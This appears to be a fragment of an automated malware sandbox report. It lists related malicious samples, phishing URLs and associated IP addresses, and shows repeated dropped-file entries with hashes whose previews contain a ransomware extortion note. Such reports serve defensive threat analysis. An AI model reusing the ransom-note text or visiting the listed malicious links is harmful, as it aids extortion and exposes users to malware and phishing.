                                                              • familycompany.net/index.php
                                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                                              • www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
                                                              BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                              • resolvedcx.com/PhpMyAdmin/
                                                              MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                              • mwpmedia.com/admin/
                                                              a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
                                                              • riwn.org/
                                                              file.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                                              • fullertonlaw.com/admin
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              lb.wordpress.comhttp://anikettiwari47.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.0.78.12
                                                              https://securemetamaskvallet.webflow.io/Get hashmaliciousUnknownBrowse
                                                              • 192.0.78.12
                                                              https://beepeople.com.br/wp-login.php?action=rp&key=A3iAn20LIOulNyvDirfj&login=www.bgdrnq.blogspot.fr%20-%20107%20156%20USD%20BTC%20i2jqdlGet hashmaliciousUnknownBrowse
                                                              • 192.0.78.13
                                                              https://kidsandcompany1.wordpress.com/Get hashmaliciousUnknownBrowse
                                                              • 192.0.78.12
                                                              https://emea.dcv.ms/haHCQHi4RDGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.0.78.13
                                                              https://emea.dcv.ms/haHCQHi4RDGet hashmaliciousHTMLPhisherBrowse
                                                              • 192.0.78.12
                                                              https://www.wita.org/wp-login.php?action=rp&key=WIXXf8mMVxmBCgiJjzdZ&login=lfair%40USChamber.comGet hashmaliciousUnknownBrowse
                                                              • 192.0.78.13
                                                              http://janecreativetileimp.wordpress.com/Get hashmaliciousUnknownBrowse
                                                              • 192.0.78.13
                                                              https://www.sql-server-performance.com/cannot-use-textimage-on/Get hashmaliciousHtmlDropperBrowse
                                                              • 192.0.78.12
                                                              http://deanthapillaystrategyinsights.wordpress.comGet hashmaliciousUnknownBrowse
                                                              • 192.0.78.13
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUShttps://s3.ap-southeast-1.amazonaws.com/gdapp-assets-sg/8f2be995-cd87-4d9c-9a62-232c61abe5bb.htmlGet hashmaliciousUnknownBrowse
                                                              • 104.21.82.51
                                                              https://skalldyr-my.sharepoint.com/:o:/p/post/EtdITQs4FcRGgNgd61rFkBIBoV1oMjyUbwcDJQUAXGgzAA?e=dpLrAeGet hashmaliciousUnknownBrowse
                                                              • 104.18.94.41
                                                              http://om.ciheam.org/om/pdf/a79/00800645.pdfGet hashmaliciousUnknownBrowse
                                                              • 104.17.24.14
                                                              https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2f3d1.gmobb.jp%2fdcm299ccyag4e%2fgov&umid=c9da0305-3df1-4ca9-b55d-4eb1dc21d559&auth=e8718e3df01d3f6f6a26ecc437e1fe16569b02b3-ce2cb0a9999be4b21ec568df281766cb7c88743eGet hashmaliciousPhisherBrowse
                                                              • 104.18.86.42
                                                              Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.192.227
                                                              #U0130#U015eLEM #U00d6ZET#U0130_110602407178699-1034 nolu TICARI -e-Banka_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              DBG1435766.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 172.67.74.152
                                                              https://clicktogo.click/downloads/tr08Get hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              http://zenodo.org/records/12885815/files/modelo-contrato-prstamo-entre-familiares-sin-intereses-pdf.pdfGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Documenti di spedizione 00028384.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.26.13.205
                                                              INETWIRE-ASWilhelm-Wagenfeld-Str16DEfile.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 95.130.17.35
                                                              file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 95.130.17.35
                                                              RHlXQuM27O.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 95.130.17.35
                                                              IMG-20230529-WA0004470000000000000000002023.exeGet hashmaliciousFormBookBrowse
                                                              • 95.130.17.35
                                                              details.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                              • 95.130.17.35
                                                              Potwierdzenie realizacji transakcji 65634634000000035322023.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                              • 95.130.17.35
                                                              PO_0033S2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 95.130.17.35
                                                              RFQ 281OR41.docGet hashmaliciousFormBookBrowse
                                                              • 95.130.17.35
                                                              PO#.exeGet hashmaliciousFormBookBrowse
                                                              • 95.130.17.35
                                                              Product Details.exeGet hashmaliciousFormBookBrowse
                                                              • 95.130.17.35
                                                              GODADDY-AMSDEfirmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.44
                                                              https://maddenturf.com/login-2/Get hashmaliciousUnknownBrowse
                                                              • 160.153.0.81
                                                              ocedures.msgGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.153
                                                              Lisa_Sierra.lnkGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              http://326707096.lisasierra.comGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              http://lisasierra.comGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              http://lisasierra.comGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              https://tradeguard.com/Get hashmaliciousUnknownBrowse
                                                              • 160.153.0.168
                                                              https://tradeguard.com/Get hashmaliciousUnknownBrowse
                                                              • 160.153.0.168
                                                              Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.62
                                                              GODADDY-AMSDEfirmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.44
                                                              https://maddenturf.com/login-2/Get hashmaliciousUnknownBrowse
                                                              • 160.153.0.81
                                                              ocedures.msgGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.153
                                                              Lisa_Sierra.lnkGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              http://326707096.lisasierra.comGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              http://lisasierra.comGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              http://lisasierra.comGet hashmaliciousUnknownBrowse
                                                              • 37.148.205.12
                                                              https://tradeguard.com/Get hashmaliciousUnknownBrowse
                                                              • 160.153.0.168
                                                              https://tradeguard.com/Get hashmaliciousUnknownBrowse
                                                              • 160.153.0.168
                                                              Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.62
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              a0e9f5d64349fb13191bc781f81f42e1s.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              v.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              Armoury.exeGet hashmaliciousLummaCBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              l.exeGet hashmaliciousLummaCBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              ZqCyroHbgC.exeGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              ZqCyroHbgC.exeGet hashmaliciousUnknownBrowse
                                                              • 160.153.0.131
                                                              • 160.153.0.174
                                                              • 95.130.22.108
                                                              • 172.67.71.217
                                                              • 80.158.2.41
                                                              • 208.73.140.70
                                                              • 52.215.137.200
                                                              • 95.215.226.251
                                                              • 85.10.140.71
                                                              • 198.185.159.145
                                                              • 185.68.16.21
                                                              • 198.185.159.144
                                                              • 87.118.122.41
                                                              • 35.215.83.253
                                                              • 185.58.213.84
                                                              • 217.160.0.18
                                                              • 138.201.61.68
                                                              • 172.67.158.62
                                                              • 109.237.132.56
                                                              • 85.92.72.56
                                                              • 23.236.62.147
                                                              • 188.246.227.29
                                                              • 188.40.30.106
                                                              • 89.116.147.189
                                                              • 188.114.97.3
                                                              • 141.95.251.157
                                                              • 89.108.65.79
                                                              • 51.15.159.75
                                                              • 188.114.96.3
                                                              • 35.214.211.239
                                                              • 134.209.129.254
                                                              • 185.15.78.186
                                                              • 104.26.0.120
                                                              • 35.214.166.193
                                                              No context
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Reputation:low
